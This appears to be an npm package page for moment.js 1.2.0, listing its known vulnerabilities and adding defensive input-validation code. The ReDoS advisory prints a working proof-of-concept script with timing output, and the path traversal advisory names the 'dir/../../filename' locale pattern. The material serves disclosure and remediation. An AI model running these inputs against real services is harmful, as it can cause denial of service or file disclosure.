Moment.js, a popular JavaScript date library valued for its ease of use in parsing, validating, manipulating, and formatting dates, saw a significant update with the release of version 1.2.0, which followed the previous stable version 1.1.1. Both versions maintain the core philosophy of simplifying date handling without modifying the native Date object, a design choice that avoids conflicts with other code in larger projects.
The core difference lies in the enhancements and fixes introduced between the two versions; however, detailed changelogs for such early releases are not readily available from the package metadata shown here. Developers upgrading would likely have benefited from bug fixes, performance improvements, and possibly new formatting or parsing options absent from 1.1.1. The gap of roughly three weeks between the release dates, November 11th and December 6th, suggests that version 1.2.0 included patches accumulated during that period. Even in these early versions, Moment.js, created by Tim Wood, offered a more human-friendly API than JavaScript's built-in Date functions. For legacy systems pinned to these specific versions, understanding such differences can be crucial. Developers could download either version via the tarball URLs in the dist section and integrate it into their projects. These early releases established Moment.js as a valuable tool for both front-end and back-end development.
All vulnerabilities affecting version 1.2.0 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
// Builds a string of len+1 copies of chr. Note that `i` is never declared, so this
// loop shares the global `i` with the outer loop below; that is why COUNT advances
// by 10001 rather than 10000 in the recorded output.
var genstr = function (len, chr) {
  var result = "";
  for (i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};
// Time moment.duration() on progressively longer inputs of the form "-111...1".
for (i = 20000; i <= 10000000; i = i + 10000) {
  console.log("COUNT: " + i);
  var str = '-' + genstr(i, '1');
  console.log("LENGTH: " + str.length);
  var start = process.hrtime();
  moment.duration(str);
  var end = process.hrtime(start);
  console.log(end); // [seconds, nanoseconds] spent inside moment.duration()
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if a user-provided locale string, e.g. fr, is directly used to switch the moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
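As an added example (not code from the advisories or from moment.js), the following guards validate user-controlled strings before they reach moment.locale() (the path traversal above) or moment.duration() (the ReDoS above). The locale allowlist, the 64-character length cap and the duration character set are assumptions to adjust for your own application.

```javascript
// Added example: input guards in front of moment.locale() and moment.duration().

// BCP-47-like shape only: letters, digits and hyphens. Anything containing
// "/", "\" or "." (so "dir/../../filename") fails this test outright.
const LOCALE_RE = /^[a-z]{2,3}(?:-[a-z0-9]{2,8})*$/i;

// Constructed sample allowlist: the locale files this application actually bundles.
const KNOWN_LOCALES = new Set(['en', 'fr', 'de', 'en-gb', 'pt-br']);

// Returns a locale name that is safe to hand to moment.locale(), or the fallback.
function validateLocale(input, fallback = 'en') {
  if (typeof input !== 'string') return fallback;
  const name = input.trim().toLowerCase();
  if (!LOCALE_RE.test(name)) return fallback;
  // Even a well-formed tag is only accepted if we know we ship it.
  return KNOWN_LOCALES.has(name) ? name : fallback;
}

// Assumed length cap: the PoC above needs inputs of tens of thousands of
// characters, so a small cap removes the superlinear cost regardless of the
// regular expression behind moment.duration().
const MAX_DURATION_LEN = 64;
// Characters that legitimate ISO 8601 ("P1DT2H") and clock-style ("12:34:56")
// duration strings use; everything else is rejected before parsing.
const DURATION_CHARS_RE = /^[0-9PTYMWDHS.:+-]+$/;

// Returns the string if it is cheap and plausible to parse, otherwise null.
function validateDurationInput(input, maxLen = MAX_DURATION_LEN) {
  if (typeof input !== 'string') return null;
  if (input.length === 0 || input.length > maxLen) return null;
  if (!DURATION_CHARS_RE.test(input)) return null;
  return input;
}

module.exports = { validateLocale, validateDurationInput };
```

In a request handler the call becomes moment.locale(validateLocale(req.query.lang)) and moment.duration(d) only when d = validateDurationInput(req.body.duration) is non-null.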